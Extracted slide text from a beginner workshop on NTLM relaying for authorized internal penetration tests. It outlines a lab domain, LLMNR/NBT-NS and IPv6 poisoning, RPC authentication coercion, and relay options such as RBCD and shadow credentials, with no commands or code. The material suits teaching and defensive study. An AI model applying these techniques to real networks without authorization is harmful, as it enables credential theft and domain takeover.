Relaying 101

How to make your internal pentests pop

Jean-Francois Maes
Practical Information

• Workbook link: https://jfmaes-1.gitbook.io/ntlm-

relaying-like-a-boss-get-da-before-lunch/setup
• VM downloads –
What this workshop is about / Who is this workshop
for?
• This workshop is for internal pentests – no red team shenanigans here J

• This workshop does not care about detection – NTLM Relaying is very much
a jackhammer approach, not a surgical one

• The intended audience for this workshop are beginning pentesters or people
interested in learning about these attacks. If you already are comfortable with
relaying attacks, this workshop is likely not for you.
Agenda
• Introducing “DA LAB”
• A “classic” internal pentest scenario – Why care about relaying anyway?
• A brief look at NTLM authentication
• Broadcast traffic = best traffic – Why is relaying still successful?
• Respond to all the things!
• All hail RPC (and IPv6)
• Relay options and gotcha’s
• Q&A
DA LAB
Quite Simple setup really!
- 1 Domain (ntlmrange.local)
- 1 DC – Any Windows Server OS
- 1 “FileServer” – Any Windows Server OS
- 1 “victim” – Any Windows OS
- 1 Attacker Controlled Machine
(any Linux distro u want)
Configuration
JUST KIDDING
Since Relaying doesn’t play well in the cloud,
we are going to use our local computer to run
the lab. VMs can be downloaded but can be
setup yourself as well, it is in the workbook. J
DA LAB
• Some setup required!
• MAKE SURE your VMS are in the same subnet and can ping eachother
• MAKE SURE your DC can still reach the internet, use nat or bridged and set the DNS server to primary
DNS DC and fallback DNS a well-known DNS provider like 8.8.8.8 or 1.1.1.1
• When joining the other VMs to the domain DO NOT use a secondary DNS, only set DNS to the DC IP
A “classic” internal pentest scenario
“You have been tasked to assess the internal security posture of Tegridy Farms.
In order to perform this assessment, Tegridy Farms has granted you permission
to come test on site as if you were a malicious insider or allows you to place an
attacker-controlled device in the network with secure remote access.”

WHAT DO YOU DO?

Thought process – What is the first step in both?
Reconnaissance
• AD Objects…
• LDAP interaction required!
• If you are lucky, you can null bind (anonymous read access)
• Usually disabled though, so no creds, no recon!
• Can sometimes be “bypassed” if they are using predictable naming conventions or
very short usernames like AA0000
Reconnaissance

So, if no null bind and no creds… AD

objects are out of the window...
Is there Anything else we can do?
NTLM Authentication

1. Request authentication
4. Forward Chal + Resp
2. Challenge
5. Validation
3. Response
6. Authenticated granted / denied
Client
Service Domain
Workstation
Database Server Controller

When the adversary obtains a challenge /

The authenticating system uses the hashed
response, offline brute force attacks can be
credential to calculate a response based on
launched to identify the hashed credential
the challenge sent by the server
that was used to generate the response
NTLM relaying in a nutshell
SMB
Broadcast Traffic = Best Traffic
• Most broadcast traffic are legacy DNS fallback protocols like LLMNR and NBT-NS
• If DNS doesn’t work, system sends broadcast message to ask if anyone knows who xxx is
• All we got to do is reply that we are xxx, and get that sweet authentication request
Respond to all the things!
All hail RPC! (and IPv6)
• What if there is no broadcast traffic? Are we stuck?
• Nope J Several RPC calls can coerce authentication some have specific requirements though such
as a specific service that needs to be running example printspooler
• If the environment is not using IPv6 but systems are configured (default) for IPv6 Solicitation, we can
poison that also.
Relay Options and gotcha’s
Relay Options and gotcha’s

Option 0: Just listen

Relay Options and gotcha’s

Option 1: Taking a dump

Relay Options and gotcha’s

Option 2: Are you wearing socks?

Relay Options and gotcha’s

Option 3: Authenticated recon baby!

Relay Options and gotcha’s

Option 4: RBCD
Relay Options and gotcha’s

Option 5: Shadow credentials

A “classic” internal pentest scenario
“You have been tasked to assess the internal security posture of Tegridy Farms.
In order to perform this assessment, Tegridy Farms has granted you permission
to come test on site as if you were a malicious insider or allows you to place an
attacker-controlled device in the network with secure remote access.”

WHAT DO YOU DO?

A “classic” internal pentest scenario

RELAY ALL THE THINGS!

+
Q&A
SHOUTOUTS
• Hack n Do
• Bytebleeder
• Hacker Recipes
• Specterops
• Dirkjan ( and fox-it )
• MdSec
• James ForShaw
• Klezvirus
• pythonresponder
• All contributors to impacket and responder
• And many many more…